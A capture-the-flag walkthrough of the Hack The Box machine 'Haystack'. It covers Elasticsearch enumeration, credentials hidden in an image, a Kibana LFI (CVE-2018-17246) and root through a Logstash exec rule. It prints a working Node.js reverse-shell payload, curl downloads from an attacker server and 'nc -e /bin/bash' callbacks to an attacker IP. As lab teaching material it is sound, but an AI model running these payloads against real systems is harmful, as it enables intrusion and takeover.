Haystack (HTB)
Haystack involves some CTF-ish steganography and searching around for initial access, researching the ELK (Elasticsearch-Logstash-Kibana) stack, understanding Grok, and using two different exploits to escalate privileges. There was a lot more to this box than I was expecting, given its “Easy” rating.
Initial Scan
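The scan output isn't reproduced here; a typical command would be something like:

```bash
# the ports that matter on this box: 22 (SSH), 80 (HTTP), 9200 (Elasticsearch)
nmap -sC -sV 10.10.10.115
```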
When I visit port 80 in a browser, I get a webpage with nothing but needle.jpg.
When I visit port 9200, I find an Elasticsearch service.
To get user credentials, we need to dig into both of these ports.
Elasticsearch
To understand how to use Elasticsearch, I consulted the official reference guide. The gist of it is that you can search through a database using GET requests via either 1) the RESTful URL or 2) cURL with a JSON body. Everything on this box is simple enough that the first technique suffices.
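A rough sketch of both styles (`<index>` is a placeholder for any index name):

```bash
# 1) RESTful URL: search terms go straight into the query string
curl 'http://10.10.10.115:9200/<index>/_search?q=*'

# 2) cURL with a JSON body: the same query in Query DSL form
curl -s 'http://10.10.10.115:9200/<index>/_search' \
     -H 'Content-Type: application/json' \
     -d '{"query": {"match_all": {}}}'
```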
First I dump all the indices available by visiting http://10.10.10.115:9200/_cat/indices?v.
I check bank and .kibana, but in the end, the only useful one is quotes, a database of Spanish quotes.
An easy way to sift through everything is to query the entire quotes index in one go and then use your browser's native Ctrl + F. Adding size=253 to the URL returns all 253 entries: http://10.10.10.115:9200/quotes/_search?q=*&size=253. The same endpoint handles targeted searches too.
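For example, searching for needle:

```bash
curl 'http://10.10.10.115:9200/quotes/_search?q=needle'
```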
Queries for “password”, “username”, and other variants result in dead ends. Clearly there’s something else on the box I need before I can even know what I’m searching for.
The needle in the haystack
Back on port 80, we had that weird JPG of a needle. There's nothing else in the source HTML of the page, and no results from fuzzing directories, but that port has to be good for something. So I run some steganography tools on the image. strings reveals some peculiar base64.
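Nothing exotic needed:

```bash
# dump printable strings from the image; one long base64 line stands out
strings needle.jpg
```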
Using CyberChef, the base64 decodes to a short Spanish sentence. In English, it reads: the needle in the haystack is "clave". (Fittingly, clave is Spanish for "key".)
Back on my Elasticsearch query (for all entries in the quotes database), I search for “clave” and find two results.
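The same search endpoint, now with the keyword from the image:

```bash
curl 'http://10.10.10.115:9200/quotes/_search?q=clave'
```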
The first base64 string reveals a password.
The second shows the username.
I use the credentials to SSH in.
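With the decoded username and password in hand (values redacted here; the account is the security user referenced later in this writeup):

```bash
ssh security@10.10.10.115
```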
And I can grab the user flag.
Kibana LFI
To fully understand this box and how to exploit it, you have to research the ELK stack quite a bit, which includes Elasticsearch, Logstash, and Kibana. There’s a lot to dig through on this machine, but if you run LinEnum, you’ll find:
- There’s a service user called kibana.
- Port 5601 (Kibana) is open to localhost (but not to the outside world).
- A Kibana binary exists.
I find the version of Kibana.
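One easy place to read it is Kibana's package.json (path assumed from a default install; it may differ):

```bash
grep '"version"' /usr/share/kibana/package.json
```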
If you search for exploits affecting this Kibana version (or, honestly, if you search for any popular ELK-stack exploits), you'll come across an LFI in Kibana's Console plugin, tracked as CVE-2018-17246. There are reference entries in the usual vulnerability databases, but the best step-by-step description I could find was from CyberArk.
In short, if you have access to the Kibana dashboard, you can use an LFI to trigger a JavaScript reverse shell payload.
The problem is, we don’t have access to this Kibana page (port 5601) from the outside. From my LinEnum output, I know that it’s running internally on the box, so I forward the port over to my Kali box.
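The forward itself, reusing the security credentials:

```bash
# -L binds local port 9000 on Kali and tunnels it to 127.0.0.1:5601 on Haystack
ssh -L 9000:127.0.0.1:5601 security@10.10.10.115
```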
To break down the syntax: this is a local port forward, binding port 9000 on my Kali box and tunneling it to port 5601 on the victim. So if I visit 127.0.0.1:9000 in my Kali web browser, I can access the Kibana dashboard (the SSH tunnel carries my HTTP request from 127.0.0.1:9000 on Kali to 127.0.0.1:5601 on the victim, neatly sidestepping the localhost-only restriction).
Per the CyberArk article, this URL contains the LFI vulnerability: http://127.0.0.1:9000/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=es_6_0. I see the result in my browser.
This executes es_6_0.js, which lives under Kibana's console plugin directory on the victim machine.
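To confirm the path yourself (a generic search, not necessarily how the original enumeration went):

```bash
find / -name 'es_6_0.js' 2>/dev/null
```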
Unfortunately, I couldn't get other LFIs to work (such as viewing /etc/passwd). The CyberArk article seems to imply that you can only verify the results of a non-JS LFI by viewing the logs, which the security user doesn't seem to have access to.
So instead of working my way up, I went for a reverse shell right off the bat. I found a JavaScript shell at https://wiremask.eu/writeups/reverse-shell-on-a-nodejs-application/.
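Lightly adapted, it looks like this; the IP and port are placeholders for your own Kali address and listener:

```javascript
(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    // 10.10.14.5:9001 is a placeholder attacker IP/port
    client.connect(9001, "10.10.14.5", function(){
        client.pipe(sh.stdin);   // attacker input -> shell
        sh.stdout.pipe(client);  // shell output -> attacker
        sh.stderr.pipe(client);
    });
    return /a/; // returning a regex keeps the parent Node process from crashing
})();
```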
I serve it on Kali using Python's SimpleHTTPServer and download it to /tmp (where I have write privileges) using curl.
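Roughly (the filename shell matches the LFI path used below; the IP is a placeholder):

```bash
# on Kali, from the directory holding the payload
python -m SimpleHTTPServer 8000

# on Haystack, via the existing SSH session
curl -o /tmp/shell http://10.10.14.5:8000/shell
```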
I set up my netcat listener on Kali.
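Nothing fancy, just a listener on whatever port the payload dials back to:

```bash
nc -lvnp 9001
```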
In my browser, I navigate to http://127.0.0.1:9000/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../tmp/shell. Back on my listener, I get a connection back as the user kibana.
I upgrade to a Python shell.
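The standard Python pty trick does the job:

```bash
python -c 'import pty; pty.spawn("/bin/bash")'
```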
Privilege escalation: Deciphering Logstash .conf files
If you run LinEnum.sh, you'll find logstash mentioned a few times (as a user, and as a process running as root). As this whole box seems to deal with the ELK stack, it makes sense to look into Logstash.
In /etc/logstash, you can find a directory called conf.d, which holds some key Logstash config files.
I read into Logstash and how it uses these three configuration files.
- input.conf determines the conditions of the input file that Logstash will act on.
- filter.conf defines a regex that matches the contents of the input file.
- output.conf determines what actions will be taken on the input file.
Let’s take a look at each of these files.
input.conf
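The file isn't reproduced verbatim here, but given the behavior described below, it looks something like this sketch:

```
input {
    file {
        path => "/opt/kibana/logstash_*"
        start_position => "beginning"
        sincedb_path => "/dev/null"
        stat_interval => "10 second"
        type => "execute"
        mode => "read"
    }
}
```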
This tells us:
- The target file must be in /opt/kibana.
- The filename must start with “logstash_”.
- Logstash checks for an input file every 10 seconds.
- The file must be executable.
filter.conf
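Again a sketch rather than a verbatim copy, but the core of it is the grok match:

```
filter {
    if [type] == "execute" {
        grok {
            match => { "message" => "Ejecutar\s*comando\s*:\s+%{GREEDYDATA:comando}" }
        }
    }
}
```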
The contents of the input file must match the regex Ejecutar\s*comando\s*:\s+%{GREEDYDATA:comando}.
output.conf
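Sketched from the behavior described next:

```
output {
    if [type] == "execute" {
        stdout { codec => json }
        exec {
            command => "%{comando} &"
        }
    }
}
```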
output.conf shows that whatever Grok captured as comando will be executed, but only for input lines that actually matched filter.conf's regex in the first place.
Abusing the .conf files
According to LinEnum.sh, a (messy) peculiar process containing a ton of Logstash references is running as root, so it's a safe assumption that the command Logstash executes per output.conf will also run as root.
My plan is to create a reverse shell payload in the target directory (from input.conf) whose contents match the regex in filter.conf. Logstash should then execute it on its own, since it scans for new input files every 10 seconds.
First, I verify I have write access to the path defined in input.conf.
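A quick sanity check against the path from input.conf:

```bash
ls -ld /opt/kibana
```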
As this is a Linux box, my first thought is a netcat payload in the input file, but there's no netcat on the box.
I move to /tmp (as I can assume it's writable), use curl -O to get nc onto the machine, and make it executable.
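Roughly, with a placeholder Kali IP and the same SimpleHTTPServer as before:

```bash
cd /tmp
curl -O http://10.10.14.5:8000/nc   # nc binary served from Kali
chmod +x nc
```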
Now that we have netcat on the machine, we have to make sure our file content matches the regex in filter.conf.
Did you notice the “grok” in filter.conf? The regex is run through a Grok processor, so we can use a tool like this Grok debugger to ensure that our file contents will match.
Now with a matching expression, I can create my file. I set up a netcat listener on my Kali machine.
Then, on Haystack, I create the payload input file and name it logstash_test.
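Putting it together (placeholder IP/port again, and assuming the uploaded nc build supports -e):

```bash
# on Kali
nc -lvnp 9002

# on Haystack: the filename must start with "logstash_" and sit in /opt/kibana
echo "Ejecutar comando : /tmp/nc -e /bin/bash 10.10.14.5 9002" > /opt/kibana/logstash_test
chmod +x /opt/kibana/logstash_test
```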
I wait for a minute (oddly, not the 10 seconds defined in input.conf) and get a connection back on my Kali listener.
I’m root. I grab the flag in the /root directory.